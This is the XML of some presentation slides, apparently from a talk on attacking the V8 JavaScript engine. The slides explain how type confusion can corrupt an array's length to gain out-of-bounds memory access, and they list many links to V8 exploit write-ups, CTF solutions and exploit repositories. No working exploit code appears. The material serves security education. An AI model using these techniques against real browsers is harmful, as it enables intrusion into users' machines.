              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-K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TypeConfusion is a technique that causes the JavaScript engine to confuse types of objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-K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When the JavaScript engine confuses an object's type, the object is corrupted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-K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The hacker's goal is to corrupt the length value of the array object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-K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If the length of an array object is corrupted, an OOB is obtained.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-K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That's what researchers call OOB.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF2B7A50-9927-4656-883B-E247275FBB18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3272713" y="2413337"/>
            <a:ext cx="8616717" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="38100"/>
          </a:effectLst>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ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OOB via this TypeConfusion is also used for Flash Scripts attacks(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/hackedteam/vector-exploit/tree/master/src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and all ECMAScript language attacks. This is not a specific technique, but an attack paradigm. Therefore, there are many ways to generate the OOB. Currently, TypeConfusion is primarily used to obtain OOB, but other OOB generation methods can also be used. This is because OOB is obtained only by manipulating the length value of an array object.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="직사각형 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C72DDF-A9BF-478E-AA96-DEB067FCC3A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="297498" y="3267996"/>
            <a:ext cx="5793430" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://phrack.org/papers/jit_exploitation.html</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hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://medium.com/@stankoja/v8-bug-hunting-part-1-setting-up-the-debug-environment-7ef34dc6f2de</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://medium.com/@stankoja/v8-bug-hunting-part-2-memory-representation-of-js-types-ea37571276b8</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8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://halbecaf.com/2017/05/24/exploiting-a-v8-oob-write/</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9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/vngkv123/aSiagaming/tree/master/Chrome-v8-oob</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10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/</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11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://changochen.github.io/2019-04-29-starctf-2019.html</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12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId13">
                <a:extLst>
                  <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                    <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                  </a:ext>
                </a:extLst>
              </a:hlinkClick>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/Escapingbug/awesome-browser-exploit</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14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://paper.seebug.org/780/</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15">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.mcafee.com/blogs/other-blogs/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/</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16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://blog.exodusintel.com/2019/04/</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17">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://googleprojectzero.blogspot.com/2019/04/virtually-unlimited-memory-escaping.html</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18">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://xz.aliyun.com/t/5190</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19">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://eternalsakura13.com/2018/11/19/justintime/</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20">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://eternalsakura13.com/2018/05/06/v8/</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21">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://bugs.chromium.org/p/chromium/issues/detail?id=594574</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.jaybosamiya.com/blog/2019/01/02/krautflare/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.jaybosamiya.com/blog/2019/01/02/krautflare/exploit_local.js</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24">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://openhome.cc/eGossip/WebAssembly/Wat2Wasm.html</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25">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.usenix.org/sites/default/files/conference/protected-files/woot18_slides_gawlik.pdf</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26">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/danbev/learning-v8</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27">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://www.tem.pw/?paged=4</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28">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://xz.aliyun.com/t/5368</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29">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/tunz/js-vuln-db</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30">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/push0ebp/v8-starter-guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId31">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://www.powerofcommunity.net/poc2018/ned.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45EDDB1A-0502-4CD5-BFBD-AF52973B8AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4364699" y="3794705"/>
            <a:ext cx="7524731" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="38100"/>
          </a:effectLst>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ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I recommend you the minimum link to reference to study browser hacking. But if you're a newbie, these links are just junk. Because it's just an alien language you can't understand at all. The reason is simple. Because you need to remodel your brain.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2320EB5-79D1-4359-8979-E34927F94657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4364699" y="4976156"/>
            <a:ext cx="7524731" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="38100"/>
          </a:effectLst>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ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The reason you are good at BOF attacks is because you know how to debug. And you can imagine a stack pointer or heap memory layout in your brain. That's why. If you apply the same method of study to other studies, then surprisingly you will be able to read all of these links.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="직사각형 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F01B37F-6597-43EF-9A17-319941BF65F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863253" y="5737903"/>
            <a:ext cx="7026177" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="38100"/>
          </a:effectLst>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ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>As an interesting example, The first step in remodeling the brain in physics is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stationary objects are not natural. It is natural for objects to move at a constant velocity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. This is not a common sense, but it is natural for physicists. If you are an ordinary person, you can't read the contents of the link on the left. You need to remodel the brain with some preparation. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="슬라이드 번호 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8765E9D6-B85F-4A56-A1CC-214F23FC2256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="날짜 개체 틀 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01361E98-6A2B-47F8-9609-E7AE26798BED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FAD1DBC-EC83-48C0-9A33-B28B34D92CDA}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198563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962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6315021"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How to enchant a d8 great sword for battle?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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782739" y="1525733"/>
            <a:ext cx="3750023"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cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>var a = new Array(3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>a[0] = ‘AAAA’, a[1] = ‘BBBB’, a[2] = ‘CCCC’;</a:t>
            </a:r>
          </a:p>
